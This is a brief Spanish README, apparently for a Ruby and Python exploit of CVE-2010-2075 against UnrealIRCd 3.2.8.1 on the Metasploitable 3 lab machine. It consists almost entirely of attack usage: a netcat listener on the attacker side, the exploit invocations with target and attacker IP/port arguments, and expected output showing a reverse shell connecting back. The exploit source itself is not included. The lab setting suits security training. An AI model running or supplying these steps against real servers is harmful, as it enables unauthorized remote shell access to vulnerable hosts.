
Exploit en Ruby y Python para CVE-2010-2075 dirigido a UnrealIRCd 3.2.8.1, que proporciona acceso remoto a una shell inversa en Metasploitable 3.
En el shell del atacante
nc -nlvp 1111
En el shell de la víctima
ruby exploit.rb 127.0.0.1
Salida esperada en el shell del atacante
listening on [any] 1111 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.105] 48144
boba_fett
En el shell de la víctima
python3 exploit.py -ri 127.0.0.1 -rp 6697 -cmd <command> -li <attacker_ip> -lp <attacker_port>
En el shell del atacante
nc -nlvp 1111